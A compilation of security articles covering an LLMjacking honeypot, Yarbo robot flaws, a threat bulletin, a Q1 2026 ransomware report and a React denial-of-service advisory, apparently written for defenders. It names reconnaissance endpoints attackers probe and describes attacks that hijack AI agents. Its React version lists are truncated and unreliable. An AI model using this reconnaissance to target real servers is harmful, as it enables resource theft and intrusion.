AI security covers more than just data theft prevention, restricting rogue AI agents, or stopping assistants from giving harmful advice. A relatively simple but rapidly scaling threat has emerged: attempts to hijack computational power and exploit someone elseβs neural network for personal gain. This is known as LLMjacking. With AI compute costs widely predicted to surge dramatically, the number of attackers driven by these motives is poised to grow. Consequently, when deploying proprietary AI servers and their supporting ecosystems like RAG or MCP, itβs critical to establish rigorous security measures from day one.
Statistics from a honeypot
The speed and scale of these resource-hijacking attempts are best illustrated by an experiment documented in detail in April 2026. The investigator configured a Raspberry Pi to masquerade as a high-performance private AI server, and made it accessible from the internet. When queried, it reported the availability of Ollama, LM Studio, AutoGPT, LangServe, and text-gen-webui servers β all tools commonly used as wrappers for locally hosted AI models. The server also appeared ready to accept API requests in the OpenAI format, which has become the industry standard.
All these services were seemingly powered by a local instance of Qwen3-Coder 30B Heretic, one of the most powerful open-source models, with its safety alignment removed. To throw in a sweetener, the honeypot reported the presence of various RAG databases and an MCP server with tempting capabilities like get_credentials on board.
In reality, the Raspberry Pi was simply hosting 500 pre-saved responses from an actual Qwen3 model, with a lightweight script selecting the most relevant answer for each incoming query. This setup was enough to pass a superficial check while allowing the researcher to probe the attackersβ intentions.
According to the author, Shodan, a popular internet scanning service, discovered the server within three hours of its going live. Just one hour later, requests resembling capability reconnaissance began pouring in. Over the following month, the server handled more than 113Β 000 requests from thousands of unique IPs, with 23% of that traffic specifically targeted at discovering AI capabilities and exploiting local LLMs and AI agents.
Requests to endpoints like /api/tags and /v1/models allow attackers to fingerprint which models are hosted on a server, while scanning for /.cursor/rules typically precedes an attempt to exploit an AI agent. Similarly, checking /.well-known/mcp.json serves as an inventory of the victimβs MCP servers. While the author makes no mention of the total number of attacks that progressed beyond simple scanning, there were 175 active attempts to hijack the LLM during the final week of the experiment alone.
What are the attackers after?
Based on the researcherβs observations, none of those targeting the decoy server attempted to execute arbitrary code or gain root access. (Editorial note: this is surprising and may point to gaps in logging.) Almost all attacks were aimed at siphoning resources. For example, the following activities were logged during the experiment:
A well-structured attempt to parse technical documentation for a microprocessor
A prompt to write an erotic novel
Requests to parse and structure social media text data regarding new vulnerabilities
An attempt to call Anthropic models using the compromised server as an API proxy
Itβs worth noting that the reconnaissance of AI resources uses standardized and rapidly evolving tools. Requests from an application named LLM-Scanner originated from the infrastructure of seven different cloud providers across eight countries, suggesting that the raiders have put established methodologies in place, as well as specialized platforms for sharing techniques. By the third week of the experiment, the scanner had been updated with an additional check: it now used simple abstract questions to determine whether itβs interacting with live AI or a honeypot returning canned responses.
Among the non-specific attacks, the experiment recorded numerous attempts to exfiltrate credentials from the .env file. Attackers systematically hunted for this file across every conceivable directory on the server. Leaving an .env file publicly accessible is one of the most elementary mistakes when deploying projects on Laravel, Node.js, and other frameworks, yet it remains a common oversight β particularly among beginners and vibe coders. Consequently, attackers have every reason to expect their efforts to pay off.
Conclusions and defense tips
Scanning publicly accessible servers and attempting to exploit them is nothing new, but the rise of LLMs gives attackers another way to monetize their efforts β one thatβs both highly lucrative for them and devastating for their victims. To understand how massive these attacks could become, look at their closest counterpart: the cryptojacking market β where criminals mine cryptocurrency using stolen computational resources. That market grew by 20% in 2025 alone. As AI-powered solutions proliferate, and as major providers hike subscription costs while local AI chips remain in short supply, we should expect LLMjacking to become an industrial-scale phenomenon.
Key defensive measures for private AI infrastructure
For AI systems running locally on a single machine, ensure that servers like LM Studio, Ollama, or similar are configured to accept connections only on the local interface (localhost), rather than all available network interfaces. This restricts LLM access to the host machine itself, and prevents the AI from being reachable over the internet.
For servers handling remote requests β even if the server only operates within a local corporate network β implement robust authentication and authorization rather than relying solely on API key validation. Solutions based on OIDC or OAuth2 with short-lived tokens are the most effective. This not only defends against LLMjacking, but also allows for more granular tracking of user activity, and prevents API key abuse. Furthermore, keys must be protected from more than just external attackers; a growing risk is the misuse of keys by AI agents themselves. This applies to LLM interfaces as well as MCP, RAG, and others.
Use network segmentation and IP allowlists to give AI server access only to the departments, employees, and services that require it.
Ensure that all client-server connections are secured with a current version of TLS.
Apply the principle of least privilege by separating access to specific services; for instance, MCP and LLM components should have their own distinct access tokens.
Ensure an EDR security agent is installed on all workstations and servers, including those hosting AI models.
Monitor AI resource consumption, establish usage quotas for different employee roles, and set up alerts for anomalous activity spikes.
Maintain detailed logs of LLM responses and requests made to the model and its supporting tools. Integrate these data sources with your SIEM. Ensure logs are resilient against tampering or deletion.
A researcher found that Yarbo yard robots came with a host of vulnerabilities which, among others, allowed an attacker to harvest WiFi passwords.
Security researcher Andreas Makris found he could remotely hijack thousands of Yarbo yard robots worldwide, and proved it by having his mower run him over. The root cause was a cluster of βlegacyβ design choices: every robot shared the same hardcoded root password, remote tunnels were left open, and Message Queuing Telemetry Transport (MQTT) messaging was so weakly protected that once you had one device, you effectively had the worldwide fleet.
An attacker could pull GPS coordinates, email addresses, and WiβFi passwords, turn cameras into remote spying tools, and even reβarm the mower after someone hit the emergency stop.Β
All of this was enabled by a persistent backdoor tunnel that users could neither see nor meaningfully control. The risks fell into three very different buckets:
A heavy mower with remotely controllable blades and an emergency stop that can be bypassed is a real-world safety hazard.
Exposed telemetry meant attackers could map where devices were, see who owned them, and in some reports even view camera feeds.
Network abuse through shared root credentials meant compromised robots could scan local networks, steal more data, or be folded into a botnet.
Yarboβs public response is unusually detailed for a consumer Internet of Things (IoT) vendor. Itβs also refreshingly blunt in admitting that the researcherβs core findings were accurate. The company temporarily disabled the remote diagnostic tunnels, reset root passwords, locked down unauthenticated endpoints, and began ripping out unnecessary legacy access paths.
More importantly, Yarbo promises structural changes:
Unique perβdevice credentials.
Over-the-Air Β (OTA) credential rotation.
Audited, allowlistβbased remote diagnostics.
Dedicated security contact, with a possible bug bounty to follow.
That is the sort of longβterm security hygiene we rarely see spelled out this clearly after an IoT fiasco.
From a disclosure and remediation standpoint, Yarbo is doing many things right: crediting the researcher, apologizing, prioritizing fixes, and explaining both shortβterm patches and longβterm architectural changes in human language. For buyers of connected devices with blades, that level of transparency is a positive precedent.
But Yarbo has explicitly chosen to keep a remote access tunnel, although wrapped in better controls and logs, instead of offering users the option to remove or fully opt out of it.
How to secure IoT devices
The vulnerabilities uncovered in the Yarbo case present an almost a live-action demo of what the IoT CybersecurityImprovement Act is trying to prevent in US government deployments. While the Act doesnβt apply to Yarbo directly, its National Institute of Standards and Technology (NIST)-driven requirements map neatly onto what went wrong here.
So, itβs still up to users to make sure you:
Change the default credentials.
Check if the vendor will make updates available and how easy it is to install them before buying an IoT product. And then install the updates when available.
If you can, put your IoT devices on a separate network. Use a guest WiβFi or separate VLAN when available.
Disable what you donβt need. Turn off UPnP, remote access, cloud control, and unnecessary services if youβre not actively using them.
If your router or security suite logs connections from IoT devices, skim those logs for odd spikes or unknown destinations.
LetβsΒ face it, an incognito window can only do so much.Β Β Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft ProtectionΒ monitors for all of it, alerts you fast, and comes with identity theft insurance.Β
For the latest discoveries in cyber research for the week of 11th May, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Instructure, the US education technology company behind the Canvas learning platform, hasΒ confirmed a major data breach affecting its cloud-hosted environment. Exposed data reportedly includes student and staff records and private messages, while ShinyHunters escalated the attack by defacing hundreds of school login portals with ransom messages.
Zara, the flagship brand of Spanish fashion group Inditex, hasΒ experienced a data breach tied to a third-party technology provider. Inditex confirmed unauthorized access, and experts verified that 197,400 unique email addresses, order IDs, purchase history, and customer support tickets were exposed.
Hungarian media company Mediaworks, which operates dozens of newspapers and online outlets, wasΒ hit by a data-theft extortion attack. The company confirmed an intrusion after World Leaks posted 8.5TB of internal files online, reportedly including payroll records, contracts, financial documents, and internal communications.
Czech automaker Ε koda hasΒ fallen victim to a security incident affecting its online shop after attackers exploited a software flaw to gain unauthorized access. Exposed customer data may include names, contact details, order history, and logins, but according to the company passwords payment card data was not affected.
AI THREATS
Researchers have uncovered a critical WebSocket hijacking vulnerability in Clineβs local Kanban server, impacting the widely used openβsource AI coding agent. Rated CVSS 9.7 and patched in version 0.1.66, the flaw allowed any website a developer visited to exfiltrate workspace data and inject arbitrary commands into the AI agent.
Security researchersΒ found a flaw in Anthropicβs Claude in Chrome extension that allowed other browser extensions to hijack the AI agent. The issue enabled malicious prompts to trigger unauthorized actions and access sensitive browser-connected data, showing how AI assistants can extend browser attack surfaces.
Researchers detailed an InstallFix campaign using fake Claude AI installer pages promoted through Google Ads to infect Windows and macOS users. Victims were tricked into running commands that launched multi-stage malware, stole browser data, disabled protections, and established persistence through scheduled tasks.
VULNERABILITIES AND PATCHES
ProgressΒ alerted customers to CVE-2026-4670, a critical authentication bypass in MOVEit Automation managed file transfer software that allows unauthorized access, and CVE-2026-5174, a privilege escalation flaw. Fixes are available in versions 2025.1.5, 2025.0.9, and 2024.1.8.
Ivanti hasΒ fixed CVE-2026-6973, a high-severity Endpoint Manager Mobile vulnerability which is exploited as a zero-day. The flaw affects EPMM 12.8.0.0 and earlier and allows attackers with administrator permissions to run remote code, while hundreds of appliances reportedly remain exposed online.
Palo Alto Networks PAN-OS Authentication Portal isΒ affected by CVE-2026-0300, a critical buffer overflow flaw allowing unauthenticated attackers to run code with root privileges on affected firewalls. Palo Alto Networks observed active exploitation against exposed portals, with no fix available at this time.
Dirty Frag, an unpatched Linux kernel flaw,Β enables local privilege escalation across Ubuntu, RHEL, Fedora, AlmaLinux, and CentOS Stream. By chaining bugs in IPsec and RxRPC, a local user can gain root access with high reliability, and public proof-of-concept code is available.
THREAT INTELLIGENCE REPORTS
ResearchersΒ linked Iranβs MuddyWater to using the Chaos ransomware as cover for espionage and data theft. In a recent case, attackers used Microsoft Teams social engineering to harvest credentials and deploy remote tools, then extorted the victim without encrypting files before leaking data.
ResearchersΒ detailed a Silver Fox campaign targeting organizations in India and Russia with tax-themed phishing emails. The activity delivered the previously undocumented ABCDoor backdoor, ValleyRAT, and related malware, affecting industrial, consulting, retail, and transportation sectors through more than 1,600 socially engineered messages.
ResearchersΒ unmasked a multi-stage phishing campaign using fake code-of-conduct emails and adversary-in-the-middle tactics to hijack sign-in sessions and bypass multi-factor authentication. Active between April 14 to 16, it targeted more than 35,000 users at 13,000 organizations across 26 countries.
ResearchersΒ profiled UAT-8302, a China-linked espionage group conducting long-term intrusions against government agencies in South America and southeastern Europe. The actors combine custom backdoors, including NetDraft and CloudSorcerer, with OneDrive and GitHub command channels and open-source tools for reconnaissance and lateral movement.
ResearchersΒ revealed a software supply chain campaign on NuGet in which five packages impersonating Chinese .NET UI libraries install an infostealer. The packages have recorded nearly 65,000 downloads, putting developer workstations and systems at risk by stealing passwords, SSH keys, and cryptocurrency wallet data.
Ransomware activity remained elevated in Q1 2026, continuing the trendΒ establishedΒ over the past year. According to the State of Ransomware Q1 2026 report from Check Point Research, overall attack volume stayed near historic highs. At the same time, the structure of the ransomware ecosystem changed materially. After two years of increasing fragmentation, activity isΒ consolidatingΒ around a smaller number of dominant groups. For organizations, this shift reduces the number of active actors but increases the potential impact of individual incidents. Β Key Findings: 2,122 organizations were listed on ransomware data leak sites in Q1 2026, making it the second-highest Q1 on record The top [β¦]
Consolidation after peak fragmentation:Β The top 10 ransomware groups accounted for 71% of all Q1 2026 victims, a sharp reversal from the fragmentation seen in Q3 2025. The ransomware ecosystem is once again consolidating around fewer, more dominant operators.
Volume stabilization at historically high levels:Β There were 2,122 victims posted on data leak sites (DLS), making this period the second-highest Q1 on record. The long growth trend is stabilizing.
Qilinβs sustained dominance:Β Qilin maintained its position as the most prominent ransomware operation for the third consecutive quarter, posting 338 victims.
The Gentlemen is the breakout story of Q1 2026Β reaching the third place on the global ransomware list, increasing their victim count from 40 victims in Q4 2025 to 166 in Q1 2026.
LockBit 5.0 comeback confirmed:Β LockBit posted 163 victims in Q1 2026, climbing to fourth place.
Ransomware in Q1 2026: Consolidation at Scale
During the first quarter of 2026, we monitored more than 70 active data leak sites (DLS) that collectively listed 2,122 new victims. This figure represents a 12.2% decline from the Q4 2025 all-time record of 2,416 victims but remains the second-highest Q1 on record at 117% above Q1 2024 (977 victims) and is keeping in line with the elevated baseline established through 2025.
Figure 1 β Total number of reported ransomware victims in DLS, per month (Jun 2024 β Mar 2026).
Monthly volumes within Q1 were consistently stable: in January there were 732 recorded victims, 684 in February, and 706 in March. This reflects a sustained operating rate of an average of 707 victims per month in Q1 2026.
The headline year-over-year (YoY) comparison shows a 7.1% decline from the 2,285 victims in Q1 2025. However, this comparison is misleading as the Q1 2025 numbers were heavily inflated byΒ Cl0pβs Cleo mass-exploitation campaignΒ which contributed approximately 390 victims in a single burst. If we exclude Cl0p from both periods, there were 1,894 victims in Q1 2025 versus 1,995 in Q1 2026, an actual YoY increase of 5.3%. The underlying growth trend in ransomware operations persists, even as the most dramatic spikes subside.
From fragmentation to consolidation
The most significant structural development seen in Q1 2026 is not the volume of attacks but the consolidation of the different operators conducting them. After two years of steady fragmentation, during which the number of active groups grew from 51 in Q1 2024 to a peak of 85 in Q3 2025 and the Top-10 share of victims fell from 68% to 57%, the ecosystem has decisively reversed course.
In Q1 2026, the top 10 groups accounted for 71.1% of all DLS-posted victims, which is the highest concentration since Q1 2024 when the ecosystem was far smaller. The number of active groups shrank from 85 to 71. Fourteen groups that were active in Q4 2025 disappeared entirely, while 21 new names appeared. However, most of the newcomers posted fewer than 10 victims, failing to take advantage of the disappearance of established mid-tier operators.
This is a common pattern repeated throughout the ecosystemβs history: law enforcement actions disrupt the ransomware market, affiliates scatter, and survivors who avoid disruption absorb the displaced talent pool and grow. Groups such as Qilin, Akira, The Gentlemen, and LockBit, who together claimed 41% of all victims in Q1, capitalized on the instability of their competitors. In Q1 2026, Qilin alone posted more victims than the combined output of the bottom 50 groups.
This dynamic carries implications beyond statistics. The consolidation of the ecosystem around fewer, more dominant operators changes its character. Larger RaaS brands invest in operational consistency, including functional decryption tools, because their business model depends on the perception that victim payment results in data recovery. In contrast, the ransomware fragmentation we saw in 2025 introduced dozens of transient operators with no such incentive to invest any effort in decryption. An example is Obscura, whose encryptionΒ bugΒ renders files over 1 GB permanently unrecoverable regardless of payment.Β For defenders and incident responders, consolidation means facing fewer but more capable adversaries.
Figure 2 β Top 10 ransomware groups by number of publicly claimed victims β Q1 2026.
Notable surges and declines
Comparing the data between Q4 2025 and Q1 2026 reveals which groups are absorbing the affiliate talent pool, and which are failing to take advantage of it.
Surges:
The Gentlemen grew by 315%, going from 40 claimed victims to 166, making them the biggest story of Q1 2026, covered in detail below.
LockBit 5.0 activity increased by 106%, from 79 victims to 163.
Nightspire, a closed-group operation with OneDrive cloud encryptionΒ capability, expanded by 183% from 29 victims to 82, sustaining growth across two consecutive quarters.
Play posted a 64% increase, going from 74 victims to 121.
Declines:
SafePay fell by 77%, going from 97 victims to 22. SafePay is a centralized, non-RaaS operation whose DLS was marked inactive from mid-March 2026 through early April for unknown reasons.
Devman declined by 70%, from 82 victims to 25. The ransomwareβs operator βTrampβ, a former Conti and Black Basta affiliate, was added to Interpolβs wanted list in January 2026. All three DLS sites went offline by early February.
Sinobi dropped by 42%, from 139 victims to 80. After a strong January (56 victims), activity collapsed to just 7 victims in March. As of the time of this publication, no postings were recorded in April.
Figure 3 β Interpolβs Red Notice for Devmanβs operator, Nefedov.
Actor Spotlight: The Gentlemen β The Breakout Story of Q1 2026
The Gentlemen is the most significant new ransomware operation to emerge in recent months. Going from zero victims in August 2025 to 166 in Q1 2026, the group achieved third place globally through a combination of pre-existing access stockpiles, aggressive geographic diversification, and a deliberate rejection of the traditional US-centric targeting model.
Figure 4 β The Gentlemen monthly victim trajectory, February peak: 82 victims in a single month.
Origins: A Qilin defection
The Gentlemen wasΒ foundedΒ by a threat actor known as Hastalamuerte β an experienced Qilin affiliate, who left the Qilin RaaS program following a dispute over an unpaid commission of approximately $48,000. This explains both its rapid operational capability and its sophistication: the operators started with established tradecraft, tooling, and, crucially, a stockpile of pre-compromised access.
The FortiGate stockpile
The groupβs most distinctive asset is a cache of approximately 14,700 pre-exploited FortiGate devices, exploited primarily via CVE-2024-55591 (a critical authentication bypass in FortiOS/FortiProxy). In addition to the exploited devices, the operators maintain 969 validated brute-forced FortiGate VPN credentials ready for attack. This stockpile provides The Gentlemen with a supply of ready-to-use initial access tools far exceeding what typical RaaS affiliates acquire through real-time exploitation or access broker purchases.
How was this stockpile acquired? According to thisΒ report, Hastalamuerte was an experienced affiliate who had previously worked with Embargo, LockBit, and Medusa before joining Qilin. Before creating their own RaaS platform, The Gentlemenβs operators βexperimented with various affiliate models used by other prominent ransomware groups.β The 14,700-device inventory likely predates the groupβs September 2025 launch. Publishing 38 victims within weeks of beginning operation strongly suggests pre-existing access in the form of a massive number of compromised devices rather than real-time exploitation.
A non-Western targeting model
The Gentlemenβs geographic distribution is a striking outlier. Only 13.3% of its victims are based in the United States, compared to the ecosystem average of 49.6%. Thailand (10.8%), Brazil (6.0%), and India (4.2%) all feature prominently on their victim list.
This may reflect the geographic distribution of exploitable FortiGate devices; the group attacks where it has pre-positioned access, and that access happens to be concentrated in APAC and Latin American networks. This is an infrastructure-driven pattern rather than a deliberate targeting strategy: the operators did not choose Thailand or Brazil based on strategic preference but are exploiting access they already have.
However, we cannot exclude a secondary factor: deliberate avoidance of US targets to reduce law enforcement risk. The Gentlemen is a Russian-speaking operation founded by an affiliate who already experienced the consequences of ransomware ecosystem disputes. The decision to exploit a globally distributed stockpile while bypassing US devices β if that is what is occurring β would represent rational risk management given the heightened US law enforcement posture.
LockBit 5.0: Making a Comeback
LockBit posted 163 victims in Q1 2026 (an increase of 106% compared to Q4 2025), climbing from outside the top 10 to fourth place globally. After an initial surge of 85 victims in January (likely to reflect the accumulation of access during the pre-launch period), activity dipped to just 33 victims in February before climbing back to 45 in March. This dip-and-recovery trajectory is characteristic of a program rebuilding its affiliate base instead of exhausting a one-time stockpile, assuming these are genuine reports and not recycled or fictional reports.
Until its takedown in early 2024, LockBit was the most dominant RaaS operation globally, responsible for 20β30% of all data-leak site victim postings. FollowingΒ Operation Cronos, several arrests and data seizures disrupted the groupβs infrastructure.Β
The new LockBit 5.0 was officially launched on the RAMP underground forum in September 2025, coinciding with the sixth anniversary of the operation. The new version introduced multi-platform support (Windows, Linux, ESXi), enhanced evasion and anti-analysis mechanisms, faster encryption routines, and randomized 16-character file extensions to disrupt signature-based detection. New affiliates wereΒ requiredΒ to provide a Bitcoin deposit of approximately $500.
Geographic diversification: from US dominance to global spread
LockBitβs geographic targeting has undergone a dramatic and measurable shift since its last appearance. Historically, the United States accounted for over 50% of LockBitβs victims β consistent with the ecosystem-wide baseline. In Q1 2026, US victims represented just 21.2% of LockBitβs total, with Italy (8.6%), Brazil (8.6%), and Turkey (5.1%) picking up the slack.
The shift away from US victims is new. Despite no documented forum announcements, the circumstantial evidence is strong: the direction is specifically toward non-US and European nations or countries with less aggressive behavior toward ransomware operators such as Italy, Brazil, and Turkey. The result is a nearly 30-percentage-point (pp) drop in US-based victims, despite an overall 106% increase in victims compared to Q4 2025.
The reaction to law enforcement actions may not result in a lower overall attack volume, but operators such as LockBitSUpp appear to be trying to redirect their activity away from the enforcing jurisdictions. Whether this represents a deliberate strategic decision or an emergent consequence of attracting affiliates from different geographic backgrounds remains an open question.
DragonForce: The Cartel Model Under Pressure
DragonForce posted 101 victims in Q1 2026 (an increase of 29% compared to Q4 2025), with a steep climb from 10 victims in January to 35 in February and 56 in March. This trajectory suggests an operation gaining momentum rather than depleting stockpiled access.
DragonForce continues to distinguish itself through its public relations strategy and βcartelβ branding, positioning itself as an umbrella organization for multiple sub-brands. However, our investigation indicates that the cartel model is smaller than advertised:
Devman, which split from DragonForce in July 2025, saw their victim totals collapse from 82 (Q4 2025) to 25 (Q1 2026). Twenty-four of those victims were posted in January.
Coinbase Cartel, initially reported as a DragonForce sub-brand, has been independently linked to the ShinyHunters operation by Bitdefender.
Obscura, cited as a potential cartel member, posted only around 20 victims in total.
DragonForceβs technical capabilities remain genuine with multi-platform support and the group actively recruits affiliates. Its data audit service, which analyzes stolen datasets exceeding 300 GB to identify the most valuable information for extortion leverage, represents genuine innovation in the extortion model. However, the broader cartel narrative appears to be more marketing than substance.
Geographic Distribution of Victims β Q1 2026
The geographic distribution of ransomware victims in Q1 2026 maintains the fundamental pattern established over previous quarters: the United States accounts for just under half of all reported cases (49.6%), with Western developed economies making up the clear majority of targets.
Figure 6 β Top 10 targeted countries, Q1 2026.
The most notable development isΒ Thailandβs entry into the top 10Β for the first time, driven almost entirely by The Gentlemen, for whom Thai organizations constitute 10.8% of total victims.Β TaiwanΒ also rose sharply (from 8 victims to 26), whileΒ South Korea dropped out entirely.Β This confirms that Qilinβs Q3 2025 financial sector campaignΒ targetingΒ 30 South Korean organizations was a one-off event rather than a sustained targeting shift.
Per-Actor Geographic Targeting: Distinct Patterns
A per-actor analysis of the top 20 groupsβ country distributions reveals that the ecosystem-level averages mask dramatically different targeting strategies. We identified six distinct geographic patterns by measuring each actorβs deviation from the 49.6% US baseline.
Pattern 1 β Extreme US focus (>75% US).Β These actors target the United States at rates far exceeding the ecosystem average:
PlayΒ (85.1% US) operates as a closed group with a Russia-nexus lineage and centralized target selection that consistently prefers US organizations.
Sinobi (76.2% US) explicitly targets US mid-market manufacturing and construction.
Genesis (93.1% US) whose near-exclusive US focus (27 of 29 confirmed victims) and emphasis on the Healthcare sector (20.7%) is striking for an emerging actor with no documented affiliate program.
Pattern 2 β Deliberate US avoidance (<25% US).Β These actors are going in the opposite direction:
Tengu (11.4% US) is the most geographically diversified actor in the top 20, with victims spread across Indonesia (8.6%), Mexico (8.6%), India (6.9%), and Italy (5.8%).
LockBit (21.5% US) represents deliberate post-disruption diversification,Β as discussed above.
Pattern 3 β Vulnerability related distribution:
Cl0pβs geographic anomalies (18.1% Canada and 8.7% Australia). Cl0pβs traditional mass exploitation campaigns produce victim distributions that mirror the installed base of the exploited software, in this case EBSΒ campaignΒ (CVE-2025-61882).
The Gentlemen (13.3% US) reflects the geographic distribution of its approximately 14,700-device FortiGate access stockpile, which is concentrated in Thailand (10.8%), Brazil (6%), and India (4.2%).
Country-Level Actor Dominance: When One Group Shapes a Nationβs Threat Profile
Flipping the analysis from βwhich countries does an actor targetβ to βwhich actors dominate each countryβ reveals an even more striking picture. Several countriesβ entire ransomware threat profiles are defined by a single actorβs operational choices.
Single-actor-shaped countries:
Country
Dominant actor
Share
Thailand
The Gentlemen
53%
Argentina
Qilin
39%
Mexico
LockBit
37%
Australia
Cl0p
34%
Switzerland
Akira
31%
Brazil
LockBit
31%
Thailandβs case is the most extreme: more than half of all Thai ransomware victims are claimed by The Gentlemen. Without this single group, Thailand would not even appear in the top-10 most-attacked countries. Similarly, without Cl0pβs Oracle EBS campaign, Australia and Canada would show substantially lower victim counts. These findings underscore that country-level ransomware statistics are frequently shaped by one actorβs specific access inventory, software exploitation campaign, or strategic redirection β not by broad shifts in the threat landscape.
Multi-actor convergence countries.Β Two countries stand out for having three or more actors independently converging to create unusually diverse threat environments:
TurkeyΒ (23 victims): LockBit (6 victims) + DragonForce (5 victims) + The Gentlemen (5 victims), 70% of Turkeyβs victim totals are due to the activity of just three actors.
JapanΒ (21 victims): The Gentlemen (6 victims) + Everest (4 victims) + Nightspire (3 victims). = 62% of the victims are due to three distinct actors. Both The Gentlemen and Nightspire exploit the same FortiGate vulnerability (CVE-2024-55591).
Ransomware Attacks by Industry β Q1 2026
The industry distribution of ransomware victims in Q1 2026 shows continued cross-sector impact, with a few notable concentrations.
Figure 7 β Ransomware victims by industry, Q1 2026.
As with geographic patterns, ecosystem-level industry averages mask fundamentally different targeting strategies at the actor level. A per-actor analysis of the top 20 groups reveals that sector selection is driven by at least three distinct observations.
Software footprint targeting.Β Cl0pβs 53.5% Business Services concentration (+18.6 percentage points above baseline) does not reflect a preference for professional services firms. It reflects the user base of Oracle EBS, the enterprise application exploited in the Q1 2026 campaign. Mass exploitation campaigns produce industry distributions that mirror the deployment pattern of the exploited software. This is the same dynamic observed in Cl0pβs geographic analysis, where Canada and Australia were over-represented because of Oracle EBS adoption.
Operational disruption maximization.Β Akiraβs targeting of Consumer Goods (23.9%, +9.8 percentage points above baseline) and Industrial Manufacturing (17.8%, +6.7 percentage points above baseline), a combined 41.7% versus the 25.1% baseline, is consistent with an economically optimized model. These sectors share high downtime costs (production lines, supply chain dependencies) and complex IT/OT environments that make recovery without decryption keys extremely difficult. With $244 million in total proceeds and a 34% share of IRΒ engagements, Akiraβs sector selection reflects deliberate targeting of firms where the pressure to pay is greatest. This is not opportunistic; itβs the Conti lineage playbook applied to the sectors where it generates the highest return per incident.
Anubis stands apart from all other top-20 actors in its willingness to target healthcare (13.0%, +8.3 percentage points above baseline) and critical infrastructure (8.7%, +7.7 percentage points above baseline).
Conclusion
In Q1 2026, the ransomware ecosystem entered a new phase. After two years of steady fragmentation, the market is reconsolidating around a smaller number of dominant operators. Qilin, Akira, The Gentlemen, and LockBit together account for 41% of all victims. Domination by the top-10 actors has returned to levels not seen since early 2024.
This consolidation is not a return to the previous state. The emerging dominant groups are more technically capable, more geographically diversified, and more resilient to disruption than their predecessors. At the same time, the economic foundations of ransomware are showing signs of stress. Payment rates have fallen to historic lows. Mass data-theft campaigns are generating diminishing returns. The gap between the growing number of DLS-posted victims (2,122 in Q1 2026) and the declining monetization per victim may accelerate the current consolidation squeezing out operators who cannot achieve sufficient scale or sophistication to remain profitable.
Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you readΒ doesnβtΒ have to feel personal.Β Try it free βΒ
AI agents are not a future concern. They are already changing how enterprise systems are accessed, automated, and abused.
And the security implication is clear: the more autonomous systems rely on APIs, the more important it becomes to know exactly which APIs exist, how they are being used, and whether they are being misused.
If your organization cannot answer those questions, you have a visibility problem. And in an environment where AI can accelerate both legitimate automation and malicious abuse, visibility is the first step to control.
Risk accelerating
APIs have always been a target because they expose data and business logic. What has changed is pace.
AI can now help attackers discover endpoints faster, test more abuse paths, and automate attacks that once took much more effort. Meanwhile, AI agents inside the enterprise are generating more API traffic, often with broader privileges than anyone intended.
That means security teams are facing a harder problem: not just more traffic, but more uncertainty and adversaries with improved tools.
What CISOs should be worried about
The biggest risks are not always the loudest ones.
Whether itβs an over-permissioned agent, a forgotten or shadow API, or a βlegitimateβ request abused to enumerate data or chain unauthorized actions, the risk is real. Itβs often compounded by API tokens with broad access and long expiration times.
These are the kinds of issues that can lead to evasive data exfiltration, unauthorized payments, compliance violations, and operational surprises that go undetected far too long.
If your API security program cannot spot abnormal behavior early, the business is exposed.
Continuously discover APIs across the environment.
Classify which ones are sensitive.
Establish baselines for normal behavior.
Detect abnormal or suspicious API activity.
Support least-privilege access for AI agents.
Help revoke risky permissions quickly.
This is how security leaders turn AI agent activity from a blind spot into something measurable and governable.
The board conversation has changed
This is no longer just a technical issue for engineering or operations.
Boards care about risk, control, and business impact. They need to know how many AI agent-facing APIs are being monitored, how many anomalous calls have been detected, and how quickly the business can respond when something looks wrong.
That is the real opportunity for CISOs: to move API security into the center of the AI risk conversation.
Download the guide now
For CISOs, security leaders, and executives, this guide explains the new API security realities emerging with AI agents. We created A CISOβs Guide to API Security in the Age of AI Agentsto help you navigate the shift with clarity and confidence.
Inside, you will learn:
Why AI agents are increasing API risk rather than replacing it.
How to connect API security to business and board-level concerns.
What to look for in a practical CISO playbook for discovery, visibility, and control.
How to govern agent-driven access before it becomes business exposure.
AI agents may change how work gets done. But the organizations that understand their APIs first will be the ones best positioned to stay in control.
TL;DR: A newly disclosed denial-of-service vulnerability, CVE-2026-23870, impacts React Server ComponentsΒ and dependent frameworks, including Next.js App Router deployments. The flaw enables unauthenticated attackers to send specially crafted HTTP requests that trigger excessive CPU consumption during request deserialization, leading to potential service degradation or total unavailability. Imperva Threat Research Group has analyzed the vulnerability and associated attack patterns. Imperva Cloud WAF and On-Prem WAF customers are already protected against exploitation attempts targeting this issue.
The Vulnerability
Researchers recently disclosed CVE-2026-23870, a high-severity denial-of-service vulnerability affecting React Server Components and downstream frameworks such as Next.js. The issue exists in how vulnerable React Server Component implementations deserialize attacker-controlled request payloads sent to Server Function endpoints.
The vulnerability stems from improper handling of cyclic or recursively referenced data structures during request processing. Specifically, vulnerable deserialization logic within the React Flight protocol can repeatedly consume maliciously crafted models before properly marking them as processed, resulting in excessive resource consumption.
In practical terms, an attacker can send a specially crafted HTTP request to exposed Server Function endpoints in applications using React Server Components. When the payload is processed, the server enters a high-CPU execution state that can persist for extended periods before eventually throwing an error. Because the error is catchable and the attack requires no authentication, attackers can repeatedly issue malicious requests to sustain denial-of-service conditions.
The issue primarily impacts:
react-server-dom-webpack
react-server-dom-parcel
react-server-dom-turbopack
Affected versions include:
0.0 through 19.0.4
1.0 through 19.1.5
2.0 through 19.2.4
Patched releases are available in:
0.5
1.6
2.5
Because React Server Components are heavily used in modern application architectures, particularly high-traffic ecommerce, SaaS, and API-driven environments, exploitation can have significant operational impact. Applications leveraging Next.js App Router deployments are especially exposed due to the widespread use of Server Function endpoints.
Some of the techniques observed or associated with exploitation include:
Crafted cyclic model payloads designed to trigger recursive deserialization behavior
Repeated requests to Server Function endpoints to sustain CPU exhaustion
Abuse of React Flight protocol request parsing logic
Application-layer denial-of-service attacks targeting availability rather than data theft
Automated scanning of exposed React and Next.js deployments for vulnerable endpoints
Unlike traditional volumetric DDoS attacks, CVE-2026-23870 enables low-bandwidth, application-layer denial of service by forcing disproportionate server-side computation. This makes the attack particularly attractive because relatively small numbers of malicious requests can create significant backend resource exhaustion.
Bottom Line
CVE-2026-23870 highlights the growing security risks associated with modern server-side rendering frameworks and component-driven architectures. By abusing request deserialization logic in React Server Components, attackers can trigger disproportionate backend resource consumption using relatively low-effort HTTP requests.
